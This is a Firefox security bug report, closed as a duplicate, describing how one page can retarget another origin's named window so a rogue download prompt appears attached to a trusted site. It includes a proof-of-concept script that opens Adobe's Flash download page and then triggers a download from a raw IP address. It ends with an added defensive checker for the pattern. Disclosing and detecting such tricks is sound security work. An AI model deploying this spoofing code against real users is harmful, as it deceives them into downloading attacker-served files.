Browser Navigation Download Trick

RESOLVED DUPLICATE of bug 741050

Status

Firefox
Security
--
critical
3 years ago
3 years ago

People

(Reporter: ashesh1708, Unassigned)

Tracking

36 Branch
x86_64
Windows 8.1

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

3 years ago
It is an important and little-known property of web browsers that one
document can always navigate other, non-same-origin windows to
arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition:
attachment, in which case, you get the original contents of the
address bar, plus a rogue download prompt attached to an unsuspecting
page that never wanted you to download that file.

PoC:
http://lcamtuf.coredump.cx/fldl/
 
==========
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
var w;
var once;
 
function doit() {
 
  if (navigator.userAgent.indexOf('MSIE') != -1)
    w = window.open('page2.html', 'foo');
  else
    w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
 
  setTimeout(donext, 4500);
 
}
 
function donext() {
  window.open('http://199.58.85.40/download2.cgi', 'foo');
  if (once != true) setTimeout(donext, 5000);
  once = true;
}
</script>



=========================================

Predictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 741050
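
A static check a reviewer could run over page or third-party script source to spot the pattern in the PoC above, where one window name is reused for navigations to more than one origin. This is an added example, not part of the original report; the function name findNamedTargetReuse, the sample script and its hosts are constructed for illustration, and the regex only sees string-literal arguments.

```javascript
// Added example: heuristic review aid, not code from the bug report.
// Flags window names that one script passes to window.open() with
// URLs on more than one origin, the reuse pattern the PoC relies on.

const RESERVED = new Set(['_blank', '_self', '_parent', '_top']);

// Matches window.open('<url>', '<name>') with quoted string literals only.
const OPEN_CALL =
  /window\.open\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*,\s*(['"])((?:\\.|(?!\3).)*)\3/g;

// Origin for http(s) URLs, bare scheme for others (e.g. data:),
// '(relative)' when the string has no scheme to parse.
function originOf(url) {
  try {
    const u = new URL(url);
    return /^https?:$/.test(u.protocol) ? u.origin : u.protocol;
  } catch {
    return '(relative)';
  }
}

// Returns [{ target, origins }] for every window name used with 2+ origins.
function findNamedTargetReuse(source) {
  const byName = new Map();
  for (const m of source.matchAll(OPEN_CALL)) {
    const [, , url, , name] = m;
    if (RESERVED.has(name.toLowerCase())) continue; // not a reusable named window
    if (!byName.has(name)) byName.set(name, new Set());
    byName.get(name).add(originOf(url));
  }
  return [...byName]
    .filter(([, origins]) => origins.size > 1)
    .map(([target, origins]) => ({ target, origins: [...origins] }));
}

// Constructed sample input; hosts are placeholders.
const SAMPLE = `
function first() { w = window.open('https://trusted.example/landing', 'foo'); setTimeout(next, 4500); }
function next()  { window.open('https://files.example/get.cgi', 'foo'); }
function help()  { window.open('/help.html', '_blank'); }
`;

console.log(findNamedTargetReuse(SAMPLE));
```

Window names or URLs built at runtime are not seen by this check, so an empty result does not clear a script.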